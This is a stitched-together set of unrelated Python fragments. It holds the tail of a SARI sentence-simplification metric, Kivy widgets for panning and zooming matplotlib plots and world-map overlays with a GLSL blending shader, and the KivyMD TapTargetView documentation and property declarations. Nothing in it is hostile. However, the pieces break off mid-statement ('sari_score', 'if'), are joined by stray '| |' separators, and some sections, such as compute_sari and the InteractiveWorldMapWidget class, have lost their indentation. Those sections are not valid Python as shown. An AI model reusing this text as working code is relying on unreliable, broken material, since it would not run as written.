    Refactor note: the original built uni/bi/tri/4-grams for source,
    candidate and every reference in three near-identical hand-unrolled
    loops; this version delegates to `_ngrams`, which produces identical
    n-gram lists for every order.
    """
    numref = len(rsents)
    source_tokens = ssent.split(" ")
    cand_tokens = csent.split(" ")
    ref_tokens = [rsent.split(" ") for rsent in rsents]

    keepscores = []
    delscores = []
    addscores = []
    # evaluate keep/delete/add on unigrams through 4-grams
    for n in range(1, 5):
        keepscore, delscore, addscore = SARIngram(
            _ngrams(source_tokens, n),
            _ngrams(cand_tokens, n),
            [_ngrams(tokens, n) for tokens in ref_tokens],
            numref,
        )
        keepscores.append(keepscore)
        delscores.append(delscore)
        addscores.append(addscore)

    avgkeepscore = sum(keepscores) / 4
    avgdelscore = sum(delscores) / 4
    avgaddscore = sum(addscores) / 4
    return (avgkeepscore + avgdelscore + avgaddscore) / 3
def normalize(sentence, lowercase: bool = True, tokenizer: str = "13a", return_str: bool = True):
    """Tokenize/normalize a sentence so it can be split on single spaces.

    Normalization is required for the ASSET dataset (one of the primary
    datasets in sentence simplification); Wiki-Auto and TURK do not need it,
    but it is applied everywhere for consistency.  Adapted from the EASSE
    library [1] written by the authors of the ASSET dataset.
    [1] https://github.com/feralvam/easse/blob/580bba7e1378fc8289c663f864e0487188fe8067/easse/utils/preprocessing.py#L7
    """
    if lowercase:
        sentence = sentence.lower()
    if tokenizer in ["13a", "intl"]:
        # sacrebleu >= 2 moved its tokenizers behind a private accessor
        if version.parse(sacrebleu.__version__).major >= 2:
            result = sacrebleu.metrics.bleu._get_tokenizer(tokenizer)()(sentence)
        else:
            result = sacrebleu.TOKENIZERS[tokenizer]()(sentence)
    elif tokenizer == "moses":
        result = sacremoses.MosesTokenizer().tokenize(sentence, return_str=True, escape=False)
    elif tokenizer == "penn":
        result = sacremoses.MosesTokenizer().penn_tokenize(sentence, return_str=True)
    else:
        # unknown tokenizer name: pass the sentence through untouched
        result = sentence
    return result if return_str else result.split()
def compute_sari(sources, predictions, references):
if not (len(sources) == len(predictions) == len(references)):
raise ValueError("Sources length must match predictions and references lengths.")
sari_score = 0
for src, pred, refs in zip(sources, predictions, references):
sari_score | |
from kivy.clock import Clock
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.uix.floatlayout import FloatLayout
from kivy.core.window import Window
from kivy.graphics import RenderContext, Color, Rectangle, BindTexture
from kivy.graphics.texture import Texture
from kivy.properties import ObjectProperty, ListProperty, StringProperty
from kivy.core.image import Image
from array import array
import numpy as np
import copy
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
from matplotlib.figure import Figure
__mydebug__ = True
class InteractivePlotWidget(Widget):
    """Pannable/zoomable widget displaying a matplotlib figure rendered into
    an OpenGL texture.

    Subclasses override :meth:`generate_mpl_plot` to draw the figure;
    :meth:`update_mpl` re-renders it and re-uploads the texture.

    BUG FIX: :meth:`set_zoom_factor` called ``check_size`` with two
    positional arguments although it accepts a single size tuple (compare
    InteractiveWorldMapOverlayWidget.set_zoom_factor), which raised
    TypeError on every call.
    """

    # Texture corners as (u, v) pairs: top-left, top-right, bottom-right,
    # bottom-left.  Shifting these pans/zooms the displayed image.
    tex_coords = ListProperty([0, 1, 1, 1, 1, 0, 0, 0])

    def __init__(self, **kwargs):
        self.canvas = RenderContext()
        # square rendering target for the matplotlib figure
        self.nx = 1024
        self.ny = self.nx
        print("On init:", self.nx, self.ny)
        with self.canvas:
            Color(1, 1, 1)
            self.texture = Texture.create(size=(self.nx, self.ny))
            # start from an opaque black RGBA buffer, then render the figure
            self.buf = [0, 0, 0, 255] * (self.nx * self.ny)
            self.arr = array('B', self.buf)
            self.update_mpl()
            self.texture.blit_buffer(self.arr, colorfmt='rgba', bufferfmt='ubyte')
            BindTexture(texture=self.texture, index=0)
            self.texture.wrap = 'clamp_to_edge'
            # create a rectangle on which to plot texture (will be at index 0)
            Color(1, 1, 1)
            self.rect = Rectangle(size=(self.nx, self.ny), texture=self.texture)
            self.rect.tex_coords = self.tex_coords
        # when True, touch drags no longer pan the plot
        self.plot_frozen = False
        # call the constructor of parent; if they are any graphics objects,
        # they will be added on our new canvas
        super(InteractivePlotWidget, self).__init__(**kwargs)
        # We'll update our glsl variables in a clock
        # Clock.schedule_interval(self.update_glsl, 0)
        Clock.schedule_interval(self.texture_init, 0)
        # Generate some default resizing behaviors
        self.bind(height=self.resize)
        self.bind(width=self.resize)

    def update_glsl(self, *largs):
        # This is needed for the default vertex shader.
        self.canvas['projection_mat'] = Window.render_context['projection_mat']
        self.canvas['modelview_mat'] = Window.render_context['modelview_mat']

    def texture_init(self, *args):
        """Scheduled once: cache the canvas' bound texture, then sync matrices."""
        self.texture = self.canvas.children[-1].texture
        self.update_glsl()

    def on_touch_move(self, touch):
        """Pan the plot by shifting texture coordinates with the drag."""
        if not self.plot_frozen:
            x_shift = -touch.dpos[0] / float(self.rect.size[0])
            y_shift = touch.dpos[1] / float(self.rect.size[1])
            for i in range(0, 8, 2):
                self.tex_coords[i] = self.tex_coords[i] + x_shift
                self.tex_coords[i + 1] = self.tex_coords[i + 1] + y_shift
            self.tex_coords = self.check_boundaries(self.tex_coords)
            self.rect.tex_coords = self.tex_coords

    def on_touch_down(self, touch):
        """Double tap resets pan/zoom so the plot fills the widget width."""
        if touch.is_double_tap:
            self.tex_coords = [0, 1, 1, 1, 1, 0, 0, 0]
            self.rect.tex_coords = self.tex_coords
            maxwidth = max(self.width, self.height * self.nx / self.ny)
            self.rect.size = self.check_size((maxwidth, self.ny * maxwidth / self.nx))
            self.rect.pos = (0.5 * (self.width - self.rect.size[0]), (self.height - self.rect.size[1]))
            x_shift = 0.0
            y_shift = -0.5 * (self.height - self.rect.size[1]) / self.rect.size[1]
            for i in range(0, 8, 2):
                self.tex_coords[i] = self.tex_coords[i] + x_shift
                self.tex_coords[i + 1] = self.tex_coords[i + 1] + y_shift
            self.tex_coords = self.check_boundaries(self.tex_coords)
            self.rect.tex_coords = self.tex_coords

    def zoom_in(self):
        """Scale the displayed plot up by sqrt(2), keeping it top-anchored."""
        if __mydebug__:
            print("InteractivePlotWidget.zoom_in:", self.rect.tex_coords, self.height)
        old_size = self.rect.size
        self.rect.size = self.check_size((self.rect.size[0] * 1.414, self.rect.size[1] * 1.414))
        self.rect.pos = (0.5 * (self.width - self.rect.size[0]), (self.height - self.rect.size[1]))
        y_shift = 0.5 * (self.rect.size[0] / old_size[0] - 1.0) * self.height / self.rect.size[1]
        x_shift = 0
        if __mydebug__:
            print("InteractivePlotWidget.zoom_in:", old_size, self.rect.size, y_shift)
        for i in range(0, 8, 2):
            self.tex_coords[i] = self.tex_coords[i] + x_shift
            self.tex_coords[i + 1] = self.tex_coords[i + 1] + y_shift
        self.tex_coords = self.check_boundaries(self.tex_coords)
        self.rect.tex_coords = self.tex_coords
        if __mydebug__:
            print("          :", self.rect.tex_coords, self.height)

    def zoom_out(self):
        """Scale the displayed plot down by ~sqrt(2)/2."""
        old_size = self.rect.size
        self.rect.size = self.check_size((self.rect.size[0] * 0.707, self.rect.size[1] * 0.707))
        self.rect.pos = (0.5 * (self.width - self.rect.size[0]), (self.height - self.rect.size[1]))
        y_shift = 0.5 * (self.rect.size[0] / old_size[0] - 1.0) * self.height / self.rect.size[1]
        x_shift = 0
        if __mydebug__:
            print("InteractivePlotWidget.zoom_out:", old_size, self.rect.size, y_shift)
        for i in range(0, 8, 2):
            self.tex_coords[i] = self.tex_coords[i] + x_shift
            self.tex_coords[i + 1] = self.tex_coords[i + 1] + y_shift
        self.tex_coords = self.check_boundaries(self.tex_coords)
        self.rect.tex_coords = self.tex_coords

    def resize(self, widget, newsize):
        """Re-fit the plot on widget size changes (same math as double-tap)."""
        if __mydebug__:
            print("InteractivePlotWidget.resize:", newsize)
        self.tex_coords = [0, 1, 1, 1, 1, 0, 0, 0]
        self.rect.tex_coords = self.tex_coords
        maxwidth = max(self.width, self.height * self.nx / self.ny)
        self.rect.size = self.check_size((maxwidth, self.ny * maxwidth / self.nx))
        self.rect.pos = (0.5 * (self.width - self.rect.size[0]), (self.height - self.rect.size[1]))
        x_shift = 0.0
        y_shift = -0.5 * (self.height - self.rect.size[1]) / self.rect.size[1]
        for i in range(0, 8, 2):
            self.tex_coords[i] = self.tex_coords[i] + x_shift
            self.tex_coords[i + 1] = self.tex_coords[i + 1] + y_shift
        self.tex_coords = self.check_boundaries(self.tex_coords)
        self.rect.tex_coords = self.tex_coords

    def set_zoom_factor(self, value):
        """Set the absolute zoom so the texture is `value` times native size.

        BUG FIX: ``check_size`` takes a single size tuple; it was previously
        called with two positional arguments, raising TypeError.
        """
        self.rect.size = self.check_size((self.nx * value, self.ny * value))
        x_shift = -0.5 * (self.width - self.rect.size[0]) / float(self.rect.size[0])
        y_shift = 0.5 * (self.height - self.rect.size[1]) / float(self.rect.size[1])
        self.tex_coords = [0, 1, 1, 1, 1, 0, 0, 0]
        for i in range(0, 8, 2):
            self.tex_coords[i] = self.tex_coords[i] + x_shift
            self.tex_coords[i + 1] = self.tex_coords[i + 1] + y_shift
        self.tex_coords = self.check_boundaries(self.tex_coords)
        self.rect.tex_coords = self.tex_coords
        self.rect.pos = (max(0, 0.5 * (self.width - self.rect.size[0])), (self.height - self.rect.size[1]))

    def check_boundaries(self, tex_coords):
        """Clamp texture coords so panning cannot move the image off-screen;
        the allowed shift is the fraction of the rectangle hidden outside
        the widget."""
        new_tex_coords = [0] * len(tex_coords)
        max_x_shift = max((self.rect.size[0] - self.width) / self.rect.size[0], 0)
        new_tex_coords[0] = max(min(tex_coords[0], max_x_shift), 0)
        new_tex_coords[2] = max(min(tex_coords[2], 1 + max_x_shift), 1)
        new_tex_coords[4] = max(min(tex_coords[4], 1 + max_x_shift), 1)
        new_tex_coords[6] = max(min(tex_coords[6], max_x_shift), 0)
        max_y_shift = max((self.rect.size[1] - self.height) / self.rect.size[1], 0)
        new_tex_coords[1] = max(min(tex_coords[1], 1 + max_y_shift), 1)
        new_tex_coords[3] = max(min(tex_coords[3], 1 + max_y_shift), 1)
        new_tex_coords[5] = max(min(tex_coords[5], max_y_shift), 0)
        new_tex_coords[7] = max(min(tex_coords[7], max_y_shift), 0)
        return new_tex_coords

    def check_size(self, size):
        """Hook for subclasses to constrain the rectangle size; identity here."""
        return size

    def update_mpl(self, **kwargs):
        """Re-render the matplotlib figure and upload it into the texture."""
        # 64 dpi over nx/64 x ny/64 inches gives exactly nx x ny pixels
        fig = Figure(figsize=(self.nx / 64, self.ny / 64), dpi=64)
        canvas = FigureCanvas(fig)
        ax = fig.add_subplot(111, position=[0, 0, 1, 1])
        self.generate_mpl_plot(fig, ax, **kwargs)
        canvas.draw()
        self.buf = np.asarray(canvas.buffer_rgba()).ravel()
        self.arr = array('B', self.buf)
        self.texture.blit_buffer(self.arr, colorfmt='rgba', bufferfmt='ubyte')

    def generate_mpl_plot(self, fig, ax, **kwargs):
        # This is where we insert a Matplotlib figure. Must use ax. and fig.
        # child commands.
        pass
# GLSL fragment shader used by InteractiveWorldMapOverlayWidget: samples the
# background map (texture0) and the matplotlib overlay (texture1) at the same
# coordinates and composites the overlay on top weighted by its alpha.
fs_multitexture = '''
$HEADER$
// New uniform that will receive texture at index 1
uniform sampler2D texture1;
void main(void) {
// multiple current color with both texture (0 and 1).
// currently, both will use exactly the same texture coordinates.
//gl_FragColor = frag_color * \
// texture2D(texture0, tex_coord0) * \
// texture2D(texture1, tex_coord0);
vec4 c0 = texture2D(texture0, tex_coord0);
vec4 c1 = texture2D(texture1, tex_coord0);
//gl_FragColor = vec4 ((c0.r*c0.a+c1.r*c1.a)/(c0.a+c1.a),(c0.g*c0.a+c1.g*c1.a)/(c0.a+c1.a),(c0.b*c0.a+c1.b*c1.a)/(c0.a+c1.a),1.0);
//gl_FragColor = (1.0/(c0.a+10.0*c1.a)) * (c0.a*c0 + 10.0*c1.a*c1) ;
gl_FragColor = (1.0-c1.a)*c0 + c1.a*c1;
}
'''
class InteractiveWorldMapOverlayWidget(Widget):
    """World-map widget blending a matplotlib-drawn RGBA overlay (texture1)
    over a background map (texture0) with the `fs_multitexture` shader.

    Subclasses override :meth:`generate_mpl_plot` to draw the overlay.

    BUG FIX: the debug trace in :meth:`zoom_out` wrongly printed
    "zoom_in", making the debug log misleading.
    """

    # Texture corners as (u, v) pairs: top-left, top-right, bottom-right,
    # bottom-left.
    tex_coords = ListProperty([0, 1, 1, 1, 1, 0, 0, 0])
    # 'repeat' lets the map wrap horizontally when panning past the edge.
    texture_wrap = StringProperty('repeat')

    def __init__(self, **kwargs):
        self.canvas = RenderContext()
        self.canvas.shader.fs = fs_multitexture
        # 2:1 equirectangular map proportions
        self.nx = 1024
        self.ny = self.nx // 2
        print("On init:", self.nx, self.ny)
        with self.canvas:
            # Overlay texture (starts as fully transparent white)
            self.texture1 = Texture.create(size=(self.nx, self.ny))
            self.buf = [255, 255, 255, 0] * (self.nx * self.ny)
            self.arr = array('B', self.buf)
            self.update_mpl()
            self.texture1.blit_buffer(self.arr, colorfmt='rgba', bufferfmt='ubyte')
            BindTexture(texture=self.texture1, index=1)
            self.texture1.wrap = self.texture_wrap
            # Background texture
            self.texture2 = Image('./images/world_spherical.jpg').texture
            self.texture2.wrap = self.texture_wrap
            self.rect = Rectangle(size=(self.nx, self.ny), texture=self.texture2)
            self.rect.tex_coords = self.tex_coords
        if __mydebug__:
            print("InteractiveWorldMapOverlayWidget._init__ rect.size:", self.rect.size)
        # set the texture1 to use texture index 1
        self.canvas['texture1'] = 1
        # Don't restrict zooming at start
        self.plot_frozen = False
        # call the constructor of parent; if they are any graphics objects,
        # they will be added on our new canvas
        super(InteractiveWorldMapOverlayWidget, self).__init__(**kwargs)
        # We'll update our glsl variables in a clock
        # Clock.schedule_interval(self.update_glsl, 0)
        Clock.schedule_interval(self.texture_init, 0)
        # Generate some default resizing behaviors
        self.bind(height=self.resize)
        self.bind(width=self.resize)

    def update_glsl(self, *largs):
        # This is needed for the default vertex shader.
        self.canvas['projection_mat'] = Window.render_context['projection_mat']
        self.canvas['modelview_mat'] = Window.render_context['modelview_mat']

    def texture_init(self, *args):
        """Scheduled once: cache the canvas' bound texture, then sync matrices."""
        self.texture = self.canvas.children[-1].texture
        self.update_glsl()

    def on_touch_move(self, touch):
        """Pan the map by shifting texture coordinates with the drag."""
        if not self.plot_frozen:
            x_shift = -touch.dpos[0] / float(self.rect.size[0])
            y_shift = touch.dpos[1] / float(self.rect.size[1])
            for i in range(0, 8, 2):
                self.tex_coords[i] = self.tex_coords[i] + x_shift
                self.tex_coords[i + 1] = self.tex_coords[i + 1] + y_shift
            if __mydebug__:
                print("InteractiveWorldMapOverlayWidget.on_touch_move:")
                print(" tex_coords before :", self.tex_coords)
                print(" size/pos/width/height :", self.rect.size, self.rect.pos, self.width, self.height)
            self.tex_coords = self.check_boundaries(self.tex_coords)
            if __mydebug__:
                print("InteractiveWorldMapOverlayWidget.on_touch_move:")
                print(" tex_coords after :", self.tex_coords)
                print(" size/pos/width/height :", self.rect.size, self.rect.pos, self.width, self.height)
            self.rect.tex_coords = self.tex_coords

    def on_touch_down(self, touch):
        """Double tap resets pan/zoom so the map fits the widget height."""
        if touch.is_double_tap:
            self.tex_coords = [0, 1, 1, 1, 1, 0, 0, 0]
            self.rect.tex_coords = self.tex_coords
            self.rect.size = self.check_size((self.nx * self.height / self.ny, self.height))
            self.rect.pos = (max(0, 0.5 * (self.width - self.rect.size[0])), (self.height - self.rect.size[1]))

    def zoom_in(self):
        """Scale the map up by sqrt(2), re-anchored to the top edge."""
        self.rect.size = self.check_size((self.rect.size[0] * 1.414, self.rect.size[1] * 1.414))
        self.rect.pos = (max(0, 0.5 * (self.width - self.rect.size[0])), (self.height - self.rect.size[1]))
        # NOTE(review): unlike zoom_out, tex_coords are not re-clamped here --
        # confirm whether check_boundaries should also run after zooming in.
        if __mydebug__:
            print("InteractiveWorldMapOverlayWidget.zoom_in", self.rect.size, self.rect.pos, self.width)

    def zoom_out(self):
        """Scale the map down by ~sqrt(2)/2 and re-clamp the visible window."""
        self.rect.size = self.check_size((self.rect.size[0] * 0.707, self.rect.size[1] * 0.707))
        self.rect.pos = (max(0, 0.5 * (self.width - self.rect.size[0])), (self.height - self.rect.size[1]))
        self.tex_coords = self.check_boundaries(self.tex_coords)
        self.rect.tex_coords = self.tex_coords
        if __mydebug__:
            # BUG FIX: this trace used to say "zoom_in"
            print("InteractiveWorldMapOverlayWidget.zoom_out:", self.rect.size, self.rect.pos, self.width)

    def resize(self, widget, newsize):
        """Re-fit the map to the new widget size (same math as double-tap)."""
        self.tex_coords = [0, 1, 1, 1, 1, 0, 0, 0]
        self.rect.tex_coords = self.tex_coords
        self.rect.size = self.check_size((self.nx * self.height / self.ny, self.height))
        self.rect.pos = (max(0, 0.5 * (self.width - self.rect.size[0])), (self.height - self.rect.size[1]))

    def set_zoom_factor(self, value):
        """Set the absolute zoom so the texture is `value` times native size."""
        self.rect.size = self.check_size((self.nx * value, self.ny * value))
        x_shift = -0.5 * (self.width - self.rect.size[0]) / float(self.rect.size[0])
        y_shift = 0.5 * (self.height - self.rect.size[1]) / float(self.rect.size[1])
        self.tex_coords = [0, 1, 1, 1, 1, 0, 0, 0]
        for i in range(0, 8, 2):
            self.tex_coords[i] = self.tex_coords[i] + x_shift
            self.tex_coords[i + 1] = self.tex_coords[i + 1] + y_shift
        self.tex_coords = self.check_boundaries(self.tex_coords)
        self.rect.tex_coords = self.tex_coords
        self.rect.pos = (max(0, 0.5 * (self.width - self.rect.size[0])), (self.height - self.rect.size[1]))

    def check_boundaries(self, tex_coords):
        """Clamp only the vertical texture coords (the map wraps horizontally,
        so x panning is unrestricted)."""
        new_tex_coords = copy.copy(tex_coords)
        max_y_shift = max((self.rect.size[1] - self.height) / self.rect.size[1], 0)
        new_tex_coords[1] = max(min(tex_coords[1], 1 + max_y_shift), 1)
        new_tex_coords[3] = max(min(tex_coords[3], 1 + max_y_shift), 1)
        new_tex_coords[5] = max(min(tex_coords[5], max_y_shift), 0)
        new_tex_coords[7] = max(min(tex_coords[7], max_y_shift), 0)
        return new_tex_coords

    def check_size(self, size):
        """Hook for subclasses to constrain the rectangle size; identity here."""
        return size

    def update_mpl(self, **kwargs):
        """Re-render the matplotlib overlay and upload it into texture1."""
        # 64 dpi over nx/64 x ny/64 inches gives exactly nx x ny pixels
        fig = Figure(figsize=(self.nx / 64, self.ny / 64), dpi=64)
        canvas = FigureCanvas(fig)
        ax = fig.add_subplot(111, position=[0, 0, 1, 1])
        self.generate_mpl_plot(fig, ax, **kwargs)
        canvas.draw()
        self.buf = np.asarray(canvas.buffer_rgba()).ravel()
        self.arr = array('B', self.buf)
        self.texture1.blit_buffer(self.arr, colorfmt='rgba', bufferfmt='ubyte')

    def generate_mpl_plot(self, fig, ax, **kwargs):
        # This is where we insert a Matplotlib figure. Must use ax. and fig.
        # child commands.
        # You probably want, but do not require, the following in your over-lay
        ax.set_facecolor((0, 0, 0, 0))
        fig.set_facecolor((0, 0, 0, 0))
class InteractiveWorldMapWidget(Widget):
tex_coords = ListProperty([0, 1, 1, 1, 1, 0, 0, 0])
texture_wrap = StringProperty('repeat')
def __init__(self, **kwargs):
    """Build the canvas with a 2:1 world-map texture and wire up pan/zoom."""
    self.canvas = RenderContext()
    # 2:1 equirectangular map proportions
    self.nx = 1024
    self.ny = self.nx//2
    if (__mydebug__) :
        print("On init:",self.nx,self.ny)
    with self.canvas:
        # Background texture
        self.texture = Image('./images/world_spherical.jpg').texture
        self.texture.wrap = self.texture_wrap
        self.rect = Rectangle(size=(self.nx,self.ny),texture=self.texture)
        self.rect.tex_coords = self.tex_coords
    if (__mydebug__) :
        print("InteractiveWorldMapWidget._init__ rect.size:",self.rect.size)
    # Don't restrict zooming at start
    self.plot_frozen = False
    # call the constructor of parent
    # if they are any graphics objects, they will be added on our new
    # canvas
    super(InteractiveWorldMapWidget, self).__init__(**kwargs)
    # We'll update our glsl variables in a clock
    # Clock.schedule_interval(self.update_glsl, 0)
    Clock.schedule_interval(self.texture_init, 0)
    # Generate some default resizing behaviors
    self.bind(height=self.resize)
    self.bind(width=self.resize)
def update_glsl(self, *largs):
    """Copy the window's current projection/modelview matrices into this
    RenderContext (required by the default vertex shader)."""
    for mat_name in ('projection_mat', 'modelview_mat'):
        self.canvas[mat_name] = Window.render_context[mat_name]
def texture_init(self, *args):
    """Scheduled once via Clock: cache the texture of the canvas' last child
    (presumably the rectangle built in __init__ -- TODO confirm ordering),
    then push the current window matrices to the shader."""
    self.texture = self.canvas.children[-1].texture
    self.update_glsl()
def on_touch_move(self,touch) :
if (not self.plot_frozen) :
x_shift = - touch.dpos[0]/float(self.rect.size[0])
y_shift = touch.dpos[1]/float(self.rect.size[1])
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
if | |
# Repository: Jonypr-code/KivyMD
"""
Components/TapTargetView
========================
.. seealso::
`TapTargetView, GitHub <https://github.com/KeepSafe/TapTargetView>`_
`TapTargetView, Material archive <https://material.io/archive/guidelines/growth-communications/feature-discovery.html#>`_
.. rubric:: Provide value and improve engagement by introducing users to new
features and functionality at relevant moments.
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-view-previous.gif
:align: center
Usage
-----
.. code-block:: python
from kivy.lang import Builder
from kivymd.app import MDApp
from kivymd.uix.taptargetview import MDTapTargetView
KV = '''
Screen:
MDFloatingActionButton:
id: button
icon: "plus"
pos: 10, 10
on_release: app.tap_target_start()
'''
class TapTargetViewDemo(MDApp):
def build(self):
screen = Builder.load_string(KV)
self.tap_target_view = MDTapTargetView(
widget=screen.ids.button,
title_text="This is an add button",
description_text="This is a description of the button",
widget_position="left_bottom",
)
return screen
def tap_target_start(self):
if self.tap_target_view.state == "close":
self.tap_target_view.start()
else:
self.tap_target_view.stop()
TapTargetViewDemo().run()
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-view-usage.gif
:align: center
Widget position
---------------
Sets the position of the widget relative to the floating circle.
.. code-block:: python
self.tap_target_view = MDTapTargetView(
...
widget_position="right",
)
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-view-widget-position-right.png
:align: center
.. code-block:: python
self.tap_target_view = MDTapTargetView(
...
widget_position="left",
)
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-view-widget-position-left.png
:align: center
.. code-block:: python
self.tap_target_view = MDTapTargetView(
...
widget_position="top",
)
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-view-widget-position-top.png
:align: center
.. code-block:: python
self.tap_target_view = MDTapTargetView(
...
widget_position="bottom",
)
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-view-widget-position-bottom.png
:align: center
.. code-block:: python
self.tap_target_view = MDTapTargetView(
...
widget_position="left_top",
)
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-view-widget-position-left_top.png
:align: center
.. code-block:: python
self.tap_target_view = MDTapTargetView(
...
widget_position="right_top",
)
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-view-widget-position-right_top.png
:align: center
.. code-block:: python
self.tap_target_view = MDTapTargetView(
...
widget_position="left_bottom",
)
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-view-widget-position-left_bottom.png
:align: center
.. code-block:: python
self.tap_target_view = MDTapTargetView(
...
widget_position="right_bottom",
)
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-view-widget-position-right_bottom.png
:align: center
If you use the ``widget_position = "center"`` parameter then you must
definitely specify the :attr:`~MDTapTargetView.title_position`.
.. code-block:: python
self.tap_target_view = MDTapTargetView(
...
widget_position="center",
title_position="left_top",
)
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-view-widget-position-center.png
:align: center
Text options
------------
.. code-block:: python
self.tap_target_view = MDTapTargetView(
...
title_text="Title text",
description_text="Description text",
)
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-view-text.png
:align: center
You can use the following options to control font size, color, and boldness:
- :attr:`~MDTapTargetView.title_text_size`
- :attr:`~MDTapTargetView.title_text_color`
- :attr:`~MDTapTargetView.title_text_bold`
- :attr:`~MDTapTargetView.description_text_size`
- :attr:`~MDTapTargetView.description_text_color`
- :attr:`~MDTapTargetView.description_text_bold`
.. code-block:: python
self.tap_target_view = MDTapTargetView(
...
title_text="Title text",
title_text_size="36sp",
description_text="Description text",
description_text_color=[1, 0, 0, 1]
)
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-text-option.png
:align: center
But you can also use markup to set these values.
.. code-block:: python
self.tap_target_view = MDTapTargetView(
...
title_text="[size=36]Title text[/size]",
description_text="[color=#ff0000ff]Description text[/color]",
)
Events control
--------------
.. code-block:: python
self.tap_target_view.bind(on_open=self.on_open, on_close=self.on_close)
.. code-block:: python
def on_open(self, instance_tap_target_view):
'''Called at the time of the start of the widget opening animation.'''
print("Open", instance_tap_target_view)
def on_close(self, instance_tap_target_view):
'''Called at the time of the start of the widget closed animation.'''
print("Close", instance_tap_target_view)
.. Note:: See other parameters in the :class:`~MDTapTargetView` class.
"""
from kivy.animation import Animation
from kivy.event import EventDispatcher
from kivy.graphics import Color, Ellipse, Rectangle
from kivy.logger import Logger
from kivy.metrics import dp
from kivy.properties import (
BooleanProperty,
ListProperty,
NumericProperty,
ObjectProperty,
OptionProperty,
StringProperty,
)
from kivy.uix.label import Label
from kivymd.theming import ThemableBehavior
class MDTapTargetView(ThemableBehavior, EventDispatcher):
"""Rough try to mimic the working of Android's TapTargetView.
:Events:
:attr:`on_open`
Called at the time of the start of the widget opening animation.
:attr:`on_close`
Called at the time of the start of the widget closed animation.
"""
widget = ObjectProperty()
"""
Widget to add ``TapTargetView`` upon.
:attr:`widget` is an :class:`~kivy.properties.ObjectProperty`
and defaults to `None`.
"""
outer_radius = NumericProperty(dp(200))
"""
Radius for outer circle.
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-view-widget-outer-radius.png
:align: center
:attr:`outer_radius` is an :class:`~kivy.properties.NumericProperty`
and defaults to `dp(200)`.
"""
outer_circle_color = ListProperty()
"""
Color for the outer circle in ``rgb`` format.
.. code-block:: python
self.tap_target_view = MDTapTargetView(
...
outer_circle_color=(1, 0, 0)
)
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-view-widget-outer-circle-color.png
:align: center
:attr:`outer_circle_color` is an :class:`~kivy.properties.ListProperty`
and defaults to ``theme_cls.primary_color``.
"""
outer_circle_alpha = NumericProperty(0.96)
"""
Alpha value for outer circle.
:attr:`outer_circle_alpha` is an :class:`~kivy.properties.NumericProperty`
and defaults to `0.96`.
"""
target_radius = NumericProperty(dp(45))
"""
Radius for target circle.
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-view-widget-target-radius.png
:align: center
:attr:`target_radius` is an :class:`~kivy.properties.NumericProperty`
and defaults to `dp(45)`.
"""
target_circle_color = ListProperty([1, 1, 1])
"""
Color for target circle in ``rgb`` format.
.. code-block:: python
self.tap_target_view = MDTapTargetView(
...
target_circle_color=(1, 0, 0)
)
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-view-widget-target-circle-color.png
:align: center
:attr:`target_circle_color` is an :class:`~kivy.properties.ListProperty`
and defaults to `[1, 1, 1]`.
"""
title_text = StringProperty()
"""
Title to be shown on the view.
:attr:`title_text` is an :class:`~kivy.properties.StringProperty`
and defaults to `''`.
"""
title_text_size = NumericProperty(dp(25))
"""
Text size for title.
:attr:`title_text_size` is an :class:`~kivy.properties.NumericProperty`
and defaults to `dp(25)`.
"""
title_text_color = ListProperty([1, 1, 1, 1])
"""
Text color for title.
:attr:`title_text_color` is an :class:`~kivy.properties.ListProperty`
and defaults to `[1, 1, 1, 1]`.
"""
title_text_bold = BooleanProperty(True)
"""
Whether title should be bold.
:attr:`title_text_bold` is an :class:`~kivy.properties.BooleanProperty`
and defaults to `True`.
"""
description_text = StringProperty()
"""
Description to be shown below the title (keep it short).
:attr:`description_text` is an :class:`~kivy.properties.StringProperty`
and defaults to `''`.
"""
description_text_size = NumericProperty(dp(20))
"""
Text size for description text.
:attr:`description_text_size` is an :class:`~kivy.properties.NumericProperty`
and defaults to `dp(20)`.
"""
description_text_color = ListProperty([0.9, 0.9, 0.9, 1])
"""
Text size for description text.
:attr:`description_text_color` is an :class:`~kivy.properties.ListProperty`
and defaults to `[0.9, 0.9, 0.9, 1]`.
"""
description_text_bold = BooleanProperty(False)
"""
Whether description should be bold.
:attr:`description_text_bold` is an :class:`~kivy.properties.BooleanProperty`
and defaults to `False`.
"""
draw_shadow = BooleanProperty(False)
"""
Whether to show shadow.
:attr:`draw_shadow` is an :class:`~kivy.properties.BooleanProperty`
and defaults to `False`.
"""
cancelable = BooleanProperty(False)
"""
Whether clicking outside the outer circle dismisses the view.
:attr:`cancelable` is an :class:`~kivy.properties.BooleanProperty`
and defaults to `False`.
"""
widget_position = OptionProperty(
"left",
options=[
"left",
"right",
"top",
"bottom",
"left_top",
"right_top",
"left_bottom",
"right_bottom",
"center",
],
)
"""
Sets the position of the widget on the :attr:`~outer_circle`. Available options are
